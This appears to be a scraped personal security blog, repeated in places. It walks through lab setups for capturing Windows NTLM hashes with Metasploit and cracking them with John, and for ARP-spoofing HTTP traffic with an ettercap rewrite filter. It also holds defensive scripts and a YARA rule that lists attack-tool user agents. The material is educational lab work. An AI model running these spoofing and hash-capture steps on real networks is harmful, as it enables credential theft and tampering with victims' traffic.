create 2 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup both virtualbox Network tab to use "Internal Network" and the same name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module
> msfconsole
msf> use auxillary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt
exploit
7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
\\169.254.18.2\
windows will popup an authentication prompt, enter a user & password (e.g. guy, password)
8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to \tmp\john.txt
type exit to exit metasploit
run john against the newly captured file
> john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt
if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen
Friday, December 27, 2019
metasploit smb capture password hashes
compare dhcp leases to active directory pcs
python script
# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
# Get-ADComputer -Filter * |select name > ad.csv
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
notInADCount = 0
searchedCount = 0
for dhcpHost in dhcpFileHandle:
foundIt = 0
with open(adFile, 'r') as adFileHandle:
for adHost in adFileHandle:
adHost = adHost.lower().strip()
dhcpHost = dhcpHost.lower().strip()
if dhcpHost == adHost:
foundIt = 1
break
searchedCount = searchedCount + 1
if foundIt == 0:
print(dhcpHost, end='', file=notInADHandle)
notInADCount = notInADCount + 1
print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))
# 1st get a list of all dhcp leased unique hostnames (from dhcp logs) and put into dhcp.csv
# 2nd get a list of all active directory computers and save it in ad.csv by running this powershell
# Get-ADComputer -Filter * |select name > ad.csv
# then run this python to compare and find the potentially rogue devices
adFile = r'ad.csv'
dhcpFile = r'dhcp.csv'
noADfile = r'notInAD.csv'
with open(dhcpFile, 'r') as dhcpFileHandle, open(noADfile, 'w') as notInADHandle:
notInADCount = 0
searchedCount = 0
for dhcpHost in dhcpFileHandle:
foundIt = 0
with open(adFile, 'r') as adFileHandle:
for adHost in adFileHandle:
adHost = adHost.lower().strip()
dhcpHost = dhcpHost.lower().strip()
if dhcpHost == adHost:
foundIt = 1
break
searchedCount = searchedCount + 1
if foundIt == 0:
print(dhcpHost, end='', file=notInADHandle)
notInADCount = notInADCount + 1
print("%s not in Active Directory, Searched %s DHCP Leases" % (str(notInADCount), str(searchedCount)))
ettercap http replace man-in-the-middle full example
create 3 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
will be hosting the website the victim wants to access
3.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
then launch python simple http server on port 8001
python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
http://169.254.18.2:8001/
you will see the text
"this is fun"
9.) on kali linux ATTACKER
create an ettercap filter file with a text editor with this content and save as "fun.filter"
if (ip.proto == TCP) {
if (tcp.dst == 8001 || tcp.src == 8001) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
msg("removed encoding");
}
if (search(DATA.data, "fun")) {
replace("fun", "evil");
msg("fun is now evil");
}
}
}
NOTE: above the accept-encoding removal is important otherwise the html is gzip encoded and not clear text so your replace won't work and the src/dst port is important so you catch request and response
next compile the filter
etterfilter fun.filter -o fun.ef
next run ettercap using the filter and arp spoofing
ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
reload the website
http://169.254.18.2:8001/
you will now see the text
"this is evil"
11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) kali linux WEB SERVER
will be hosting the website the victim wants to access
3.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup all 3 virtualbox Network tab to use "Internal Network" and the same name
2.) power up all 3
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux WEB SERVER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.3 netmask 255.255.0.0 up
6.) ping each other system from within each virtual machine to ensure connectivity
7.) on kali linux WEB SERVER create an index.html file that simply says "hello world this is fun exciting stuff"
then launch python simple http server on port 8001
python -m SimpleHTTPServer 8001
8.) on windows VICTIM open microsoft edge and navigate to website
http://169.254.18.2:8001/
you will see the text
"this is fun"
9.) on kali linux ATTACKER
create an ettercap filter file with a text editor with this content and save as "fun.filter"
if (ip.proto == TCP) {
if (tcp.dst == 8001 || tcp.src == 8001) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Nothing!");
msg("removed encoding");
}
if (search(DATA.data, "fun")) {
replace("fun", "evil");
msg("fun is now evil");
}
}
}
NOTE: above the accept-encoding removal is important otherwise the html is gzip encoded and not clear text so your replace won't work and the src/dst port is important so you catch request and response
next compile the filter
etterfilter fun.filter -o fun.ef
next run ettercap using the filter and arp spoofing
ettercap -tq -M arp:remote -F fun.ef /169.254.18.1-3// /169.254.18.1-3//
10.) on windows VICTIM
reload the website
http://169.254.18.2:8001/
you will now see the text
"this is evil"
11.) on kali linux ATTACKER hit the "q" key to remove the arp poisoning and exit
Monday, December 23, 2019
update datetime on linux
# ntpdate 2.us.pool.ntp.org
syncs with internet time
syncs with internet time
navigator DOM keys
document.write("navigator.appName = " + navigator.appName + "<br/>")
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>")
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>")
document.write("navigator.platform = " + navigator.platform + "<br/>")
document.write("navigator.vendor = " + navigator.vendor + "<br/>")
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");
-----------------
sample output
-----------------
Google Chrome on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107
-----------------
Internet Explorer on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
-----------------
Microsoft Edge on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub =
-----------------
FireFox ESR on 64bit Kali Linux
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor =
navigator.vendorSub =
document.write("navigator.appCodeName = " + navigator.appCodeName + "<br/>")
document.write("navigator.appVersion = " + navigator.appVersion + "<br/>")
document.write("navigator.platform = " + navigator.platform + "<br/>")
document.write("navigator.vendor = " + navigator.vendor + "<br/>")
document.write("navigator.vendorSub = " + navigator.vendorSub + "<br/>");
document.write("navigator.buildID = " + navigator.buildID + "<br/>");
document.write("navigator.oscpu = " + navigator.oscpu + "<br/>");
document.write("navigator.product = " + navigator.product + "<br/>");
document.write("navigator.productSub = " + navigator.productSub + "<br/>");
sample output
-----------------
Google Chrome on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36
navigator.platform = Win32
navigator.vendor = Google Inc.
navigator.vendorSub =
navigator.buildID = undefined
navigator.oscpu = undefined
navigator.product = Gecko
navigator.productSub = 20030107
-----------------
Internet Explorer on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; wbx 1.0.0; rv:11.0) like Gecko
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub = undefined
-----------------
Microsoft Edge on 64bit Windows 10
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763
navigator.platform = Win32
navigator.vendor =
navigator.vendorSub =
-----------------
FireFox ESR on 64bit Kali Linux
-----------------
navigator.appName = Netscape
navigator.appCodeName = Mozilla
navigator.appVersion = 5.0 (X11)
navigator.platform = Linux x86_64
navigator.vendor =
navigator.vendorSub =
Friday, December 20, 2019
Virtual Box local contained lab, VM to VM
network for both kali & windows
"internal network"
on kali type
ifconfig eth0 169.254.18.XXX netmask 255.255.0.0 up
on kali
ping windows
on windows
ping kali
"internal network"
on kali type
ifconfig eth0 169.254.18.XXX netmask 255.255.0.0 up
on kali
ping windows
on windows
ping kali
Thursday, December 5, 2019
yaraOneLiner.py
# Run Yara Rules against a file ONE LINE AT A TIME instead of against the whole file
import os
import subprocess
import traceback
import argparse
import sys
yaraParams = "-s"
tempFileName = "yaraOneLiner.tmp"
lineNumber = 1
output = ""
arguments = argparse.ArgumentParser("yaraOneLine.py -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()
with open(settings.inputFileName, "r") as lines:
for line in lines:
line = line.rstrip()
if settings.debug:
print("\r\n---\r\nLINE %s: %s" % (str(lineNumber) , line))
if settings.status:
if (lineNumber % 50) == 0 and lineNumber != 0:
print("STATUS: processing line %s" % (str(lineNumber)))
with open(tempFileName,"w") as tempfile:
tempfile.write(line)
try:
yaraCommand = ("%s %s %s %s" % (settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName))
if settings.debug:
print("ABOUT TO RUN: %s" % yaraCommand)
if settings.debug:
pause = input()
if settings.debug:
print("STARTED: YARA")
output = subprocess.check_output(yaraCommand, shell=True)
if settings.debug:
print("OUTPUT: %s" % str(output))
except Exception as e:
error = str(e)
print("COMMAND: %s" % yaraCommand)
print("OUTPUT: %s" % output)
print("ERROR: %s" % error)
output = ""
if output is None or len(output) == 0:
if settings.debug:
print("MATCHES: 0 (no output)")
else:
output = str(output).replace("b'","").rstrip()
if output[-1:] == "'":
output = output[:-1]
if tempFileName in output:
if settings.debug:
print("MATCHES: 1+")
print("MATCH LINE NUMBER %s:" % str(lineNumber))
print(" LINE: %s" + line)
print(" YARA:")
for row in output.split("\\r\\n"):
row = row.replace("\\r\\n", "")
if row.startswith("0x"):
print(" %s" % row)
else:
print(" %s" % row)
else:
print("MATCHES: 0 (with output)")
lineNumber = lineNumber + 1
import os
import subprocess
import traceback
import argparse
import sys
yaraParams = "-s"
tempFileName = "yaraOneLiner.tmp"
lineNumber = 1
output = ""
arguments = argparse.ArgumentParser("yaraOneLine.py -e yara64.exe -f input.csv -r rule.yar")
arguments.add_argument("-e", "--yaraExe", type=str, required=True, help="Yara executable to use")
arguments.add_argument("-f", "--inputFileName", type=str, required=True, help="Input file to yara scan")
arguments.add_argument("-r", "--yaraRuleFile", type=str, required=True, help="Yara rule file to scan against")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-s", "--status", action="store_true", required=False, help="Enable status tracking for large files")
settings = arguments.parse_args()
with open(settings.inputFileName, "r") as lines:
for line in lines:
line = line.rstrip()
if settings.debug:
print("\r\n---\r\nLINE %s: %s" % (str(lineNumber) , line))
if settings.status:
if (lineNumber % 50) == 0 and lineNumber != 0:
print("STATUS: processing line %s" % (str(lineNumber)))
with open(tempFileName,"w") as tempfile:
tempfile.write(line)
try:
yaraCommand = ("%s %s %s %s" % (settings.yaraExe, yaraParams, settings.yaraRuleFile, tempFileName))
if settings.debug:
print("ABOUT TO RUN: %s" % yaraCommand)
if settings.debug:
pause = input()
if settings.debug:
print("STARTED: YARA")
output = subprocess.check_output(yaraCommand, shell=True)
if settings.debug:
print("OUTPUT: %s" % str(output))
except Exception as e:
error = str(e)
print("COMMAND: %s" % yaraCommand)
print("OUTPUT: %s" % output)
print("ERROR: %s" % error)
output = ""
if output is None or len(output) == 0:
if settings.debug:
print("MATCHES: 0 (no output)")
else:
output = str(output).replace("b'","").rstrip()
if output[-1:] == "'":
output = output[:-1]
if tempFileName in output:
if settings.debug:
print("MATCHES: 1+")
print("MATCH LINE NUMBER %s:" % str(lineNumber))
print(" LINE: %s" + line)
print(" YARA:")
for row in output.split("\\r\\n"):
row = row.replace("\\r\\n", "")
if row.startswith("0x"):
print(" %s" % row)
else:
print(" %s" % row)
else:
print("MATCHES: 0 (with output)")
lineNumber = lineNumber + 1
Neo23x0 Sigma Proxy Rules converted to simple Yara
rule Neo23x0SigmaUserAgentMatch
{
meta:
author = "@neonprimetime"
description = "@Neo23x0 Proxy User Agent Rules https://github.com/Neo23x0/sigma/tree/master/rules/proxy"
strings:
$string1 = "(compatible;MSIE"
$string2 = "BFAC"
$string3 = "BGroom"
$string4 = "CholTBAgent"
$string5 = "Havij"
$string7 = "adlib/"
$string8 = "arachni/"
$string9 = "asd"
$string10 = "brutus"
$string11 = "cgichk"
$string12 = "changhuatong"
$string13 = "crimscanner/"
$string14 = "inspath"
$string15 = "mdms"
$string16 = "metis"
$string17 = "pxyscand"
$string18 = "tiny"
$string19 = "vega/"
$string20 = "whcc/"
$string21 = "zmeu"
$string22 = "(Charon; Inferno)"
$string23 = "(hydra)"
$string24 = ".0;Windows NT"
$string25 = "<|>"
$string26 = "Bot"
$string27 = "Microsoft Internet Explorer"
$string28 = "Telegram"
$string29 = "absinthe"
$string30 = "bsqlbf"
$string31 = "core-project/1.0"
$string32 = "datacha0s"
$string33 = "dirbuster"
$string34 = "domino hunter"
$string35 = "dotdotpwn"
$string36 = "exploit"
$string37 = "floodgate"
$string38 = "get-minimal"
$string39 = "gootkit auto-rooter scanner"
$string40 = "grendel-scan"
$string41 = "internet ninja"
$string42 = "jaascois"
$string43 = "masscan"
$string44 = "morfeus fucking scanner"
$string45 = "mysqloit"
$string46 = "n-stealth"
$string47 = "nsauditor"
$string48 = "pangolin"
$string49 = "pmafind"
$string50 = "security scan"
$string51 = "springenwerk"
$string52 = "sql power injector"
$string53 = "sqlmap"
$string54 = "sqlninja"
$string55 = "teh forest lobster"
$string56 = "toata dragostea"
$string57 = "uil2pn"
$string58 = "voideye"
$string59 = "webshag"
$string60 = "webvulnscan"
$string61 = "wordpress hash grabber"
$string62 = "zeroup"
$string63 = "AutoIt"
$string64 = "CertUtil URL Agent"
$string65 = "DotDotPwn v2.1"
$string66 = "FHScan Core"
$string67 = "HttpBrowser/1.0"
$string68 = "IczelionDownLoad"
$string69 = "Internet Explorer"
$string75 = "Moxilla"
$string78 = "Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
$string79 = "Mozilla v5.1"
$string80 = "Mozilla/1.0"
$string81 = "Mozilla/2.0"
$string83 = "Mozilla/4.0 (compatible; MSI 6.0;"
$string84 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)"
$string85 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
$string86 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
$string87 = "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"
$string88 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
$string89 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
$string90 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
$string91 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
$string92 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string93 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string94 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
$string95 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
$string96 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR = {7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N"
$string97 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
$string98 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)"
$string99 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
$string100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)"
$string101 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
$string102 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
$string103 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
$string104 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
$string105 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
$string106 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)"
$string107 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)"
$string108 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)"
$string109 = "Mozilla/4.0 (compatible; Metasploit RSPEC)"
$string110 = "Mozilla/4.0 (compatible; RMS)"
$string111 = "Mozilla/4.0 (compatible; SPIPE/1.0"
$string112 = "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)"
$string114 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)"
$string115 = "Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)"
$string117 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)"
$string118 = "Mozilla/5.0 (Windows NT 5.1 ; v."
$string119 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
$string120 = "Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko"
$string121 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Chrome /53.0"
$string122 = "Mozilla/5.0 (Windows NT 6.2; WOW64; rv:20.0) Gecko/20100101 Firefox/"
$string123 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string124 = "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0"
$string125 = "Mozilla/5.0 (Windows NT 6.3; rv:39.0) Gecko/20100101 Firefox/35.0"
$string126 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/2"
$string127 = "Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0"
$string128 = "Mozilla/5.0 (Windows NT 9;"
$string129 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/525.13"
$string130 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Firefox/3.6.13 GTB7.1"
$string131 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30729)"
$string132 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.1 (.NET CLR 3.5.30731)"
$string133 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
$string134 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/200"
$string135 = "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7"
$string136 = "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
$string137 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; Trident/5.0"
$string138 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
$string139 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MAAU)"
$string140 = "Mozilla/5.0 WinInet"
$string142 = "Mozilla/6.1 (compatible; MSIE 9.0; Windows NT 5.3; Trident/5.0)"
$string143 = "Netscape"
$string144 = "O/9.27 (W; U; Z)"
$string146 = "Opera/8.81 (Windows NT 6.0; U; en)"
$string147 = "RookIE/1.0"
$string148 = "SIPDROID"
$string149 = "SJZJ (compatible; MSIE 6.0; Win32)"
$string150 = "Sametime Community Agent"
$string151 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC"
$string152 = "Wget/1.9+cvs-stable (Red Hat modified)"
$string154 = "X-FORWARDED-FOR"
$string155 = "XMRig"
$string157 = "backdoorbot"
$string158 = "ccminer"
$string159 = "hots scot"
$string160 = "nocase"
$string161 = "nsis_inetc (mozilla)"
$string162 = "ruler"
$string163 = "sample"
$string164 = "user-agent"
condition:
1 of them
}
{
meta:
author = "@neonprimetime"
description = "@Neo23x0 Proxy User Agent Rules https://github.com/Neo23x0/sigma/tree/master/rules/proxy"
strings:
$string1 = "(compatible;MSIE"
$string2 = "BFAC"
$string3 = "BGroom"
$string4 = "CholTBAgent"
$string5 = "Havij"
$string7 = "adlib/"
$string8 = "arachni/"
$string9 = "asd"
$string10 = "brutus"
$string11 = "cgichk"
$string12 = "changhuatong"
$string13 = "crimscanner/"
$string14 = "inspath"
$string15 = "mdms"
$string16 = "metis"
$string17 = "pxyscand"
$string18 = "tiny"
$string19 = "vega/"
$string20 = "whcc/"
$string21 = "zmeu"
$string22 = "(Charon; Inferno)"
$string23 = "(hydra)"
$string24 = ".0;Windows NT"
$string25 = "<|>"
$string26 = "Bot"
$string27 = "Microsoft Internet Explorer"
$string28 = "Telegram"
$string29 = "absinthe"
$string30 = "bsqlbf"
$string31 = "core-project/1.0"
$string32 = "datacha0s"
$string33 = "dirbuster"
$string34 = "domino hunter"
$string35 = "dotdotpwn"
$string36 = "exploit"
$string37 = "floodgate"
$string38 = "get-minimal"
$string39 = "gootkit auto-rooter scanner"
$string40 = "grendel-scan"
$string41 = "internet ninja"
$string42 = "jaascois"
$string43 = "masscan"
$string44 = "morfeus fucking scanner"
$string45 = "mysqloit"
$string46 = "n-stealth"
$string47 = "nsauditor"
$string48 = "pangolin"
$string49 = "pmafind"
$string50 = "security scan"
$string51 = "springenwerk"
$string52 = "sql power injector"
$string53 = "sqlmap"
$string54 = "sqlninja"
$string55 = "teh forest lobster"
$string56 = "toata dragostea"
$string57 = "uil2pn"
$string58 = "voideye"
$string59 = "webshag"
$string60 = "webvulnscan"
$string61 = "wordpress hash grabber"
$string62 = "zeroup"
$string63 = "AutoIt"
$string64 = "CertUtil URL Agent"
$string65 = "DotDotPwn v2.1"
$string66 = "FHScan Core"
$string67 = "HttpBrowser/1.0"
$string68 = "IczelionDownLoad"
$string69 = "Internet Explorer"
$string75 = "Moxilla"
$string78 = "Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1"
$string79 = "Mozilla v5.1"
$string80 = "Mozilla/1.0"
$string81 = "Mozilla/2.0"
$string83 = "Mozilla/4.0 (compatible; MSI 6.0;"
$string84 = "Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; SV1)"
$string85 = "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
$string86 = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
$string87 = "Mozilla/4.0 (compatible; MSIE 6.0; DynGate)"
$string88 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"
$string89 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
$string90 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1)"
$string91 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2)"
$string92 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string93 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)"
$string94 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0)"
$string95 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
$string96 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0; SIMBAR = {7DB0F6DE-8DE7-4841-9084-28FA914B0F2E}; SLCC1; .N"
$string97 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)"
$string98 = "Mozilla/4.0 (compatible; MSIE 7.4; Win32;32-bit)"
$string99 = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"
$string100 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)"
$string101 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1)"
$string102 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
$string103 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/5.0)"
$string104 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; SV1)"
$string105 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)"
$string106 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; .NET CLR 1.1.4322)"
$string107 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NETCLR 2.0.50727)"
$string108 = "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)"
$string109 = "Mozilla/4.0 (compatible; Metasploit RSPEC)"
$string110 = "Mozilla/4.0 (compatible; RMS)"
$string111 = "Mozilla/4.0 (compatible; SPIPE/1.0"
$string112 = "Mozilla/4.0 (compatible;MSIE 7.0;Windows NT 6.0)"
$string114 = "Mozilla/4.0(compatible; MSIE 6.0; Windows NT 5.1)"
$string115 = "Mozilla/5.0 (Windows NT 10.0; Win32; x32; rv:60.0)"
$string117 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0)"
$string118 = "Mozilla/5.0 (Windows NT 5.1 ; v."
$string119 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"
